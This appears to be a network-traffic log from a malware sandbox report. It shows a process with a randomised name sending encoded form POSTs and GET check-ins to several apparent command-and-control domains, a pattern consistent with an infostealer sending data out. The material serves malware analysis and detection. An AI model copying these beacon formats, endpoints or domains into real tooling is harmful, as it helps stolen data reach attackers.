Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:09.075884104 CEST | 558 | OUT | GET /2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.elsupertodo.net
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 16:34:09.576822042 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:34:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.elsupertodo.net/2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49807 | 3.33.130.190 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:24.676636934 CEST | 809 | OUT | POST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 68 62 58 62 50 76 38 4f 73 4c 6a 43 41 63 70 71 6d 51 4f 6f 31 57 70 61 75 35 41 4e 48 76 56 73 67 3d 3d
                                                                        Data Ascii: -NnllVvH=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49820 | 3.33.130.190 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:27.228100061 CEST | 829 | OUT | POST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 79 61 48 70 77 30 41 45 53 63 33 69 54 2b 67 66 35 51 71 53 47 55 69 43 73 2b 4a 31 4d 77 62 6f 55 3d
                                                                        Data Ascii: -NnllVvH=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ61yaHpw0AESc3iT+gf5QqSGUiCs+J1MwboU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49838 | 3.33.130.190 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:29.774672031 CEST | 10911 | OUT | POST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 4c 42 4f 43 55 30 6e 57 46 79 6c 44 75 51 53 62 6b 33 4c 30 71 63 35 77 7a 78 7a 4e 35 32 2f 52 75 72 6d 31 42 42 61 45 4e 7a 59 34 6d 75 48 76 70 76 69 6b 48 48 6c 53 7a 31 7a 43 74 57 43 38 71 69 6b 4d 72 33 64 71 62 31 73 74 45 2f 4f 4d 62 4f 4b 4c 7a 75 72 46 37 62 61 78 58 63 75 6a 36 39 43 6b 76 65 7a 76 34 2b 48 66 53 7a 31 65 68 67 4a 78 36 72 6f 50 4a 6b 67 30 6a 76 45 78 4b 37 4b 58 7a 79 34 53 59 45 6b 57 51 73 52 58 79 6a 62 6f 67 69 2b 65 7a 2b 70 75 63 50 79 [TRUNCATED]
Data Ascii: -NnllVvH= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49854 | 3.33.130.190 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:32.318255901 CEST | 554 | OUT | GET /7xi5/?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 16:34:32.772227049 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Tue, 08 Oct 2024 14:34:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 264
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4e 6e 6c 6c 56 76 48 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 36 64 35 39 53 76 70 67 44 42 2b 7a 71 53 46 41 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 42 78 2f 2b 50 45 58 72 70 46 36 33 75 70 74 46 32 67 77 4b 41 63 4e 61 6f 4a 65 6c 5a 34 35 69 48 48 34 3d 26 65 36 6d 68 78 3d 4c 5a 77 78 50 4c 72 68 71 74 5f 38 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49884 | 172.191.244.62 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:38.419114113 CEST | 809 | OUT | POST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 43 64 2b 66 31 69 2b 75 2b 79 6f 68 58 41 73 6f 43 57 70 4e 57 4e 4e 6c 34 78 69 6e 77 6b 34 4d 51 3d 3d
                                                                        Data Ascii: -NnllVvH=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaCd+f1i+u+yohXAsoCWpNWNNl4xinwk4MQ==
Oct 8, 2024 16:34:38.867480040 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:38 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49898 | 172.191.244.62 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:40.963867903 CEST | 829 | OUT | POST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 70 2b 34 2f 34 57 71 7a 5a 78 58 65 54 50 6c 75 58 57 6b 71 65 7a 52 6e 2b 31 39 61 4c 57 69 32 67 3d
                                                                        Data Ascii: -NnllVvH=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWp+4/4WqzZxXeTPluXWkqezRn+19aLWi2g=
Oct 8, 2024 16:34:41.457806110 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:41 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49915 | 172.191.244.62 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:43.707895994 CEST | 10911 | OUT | POST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 6d 6b 38 32 55 79 67 6e 44 79 65 41 35 6b 73 50 38 43 76 68 78 64 53 2b 7a 48 74 73 2f 4b 38 2b 61 74 53 47 62 72 67 5a 47 63 78 52 74 45 55 79 4a 76 34 4a 2b 34 50 34 67 33 32 6f 61 52 47 52 57 59 6a 68 34 61 58 6c 61 53 6b 6a 4f 44 65 59 37 70 36 6f 30 73 52 4d 4b 35 33 64 58 69 30 75 6f 62 45 5a 57 43 2b 6d 55 4e 59 72 59 6b 4a 65 50 30 52 59 4c 44 36 30 53 6d 57 69 79 4b 47 51 75 4f 39 51 49 31 41 42 53 2f 2f 4a 64 6e 77 4f 7a 41 74 41 30 71 69 74 4f 6e 72 38 54 41 34 [TRUNCATED]
Data Ascii: -NnllVvH= [TRUNCATED]
Oct 8, 2024 16:34:44.171924114 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:44 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49929 | 172.191.244.62 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:46.256012917 CEST | 554 | OUT | GET /fpzw/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 16:34:46.735551119 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:46 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49965 | 172.96.191.39 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:34:51.919229031 CEST | 818 | OUT | POST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 49 4d 6a 66 6b 6f 31 6c 74 4e 35 2b 6b 65 6e 62 68 45 5a 73 78 54 46 46 39 6b 2b 30 2b 43 56 5a 77 3d 3d
                                                                        Data Ascii: -NnllVvH=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUIMjfko1ltN5+kenbhEZsxTFF9k+0+CVZw==
                                                                        Oct 8, 2024 16:34:53.051943064 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:52 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
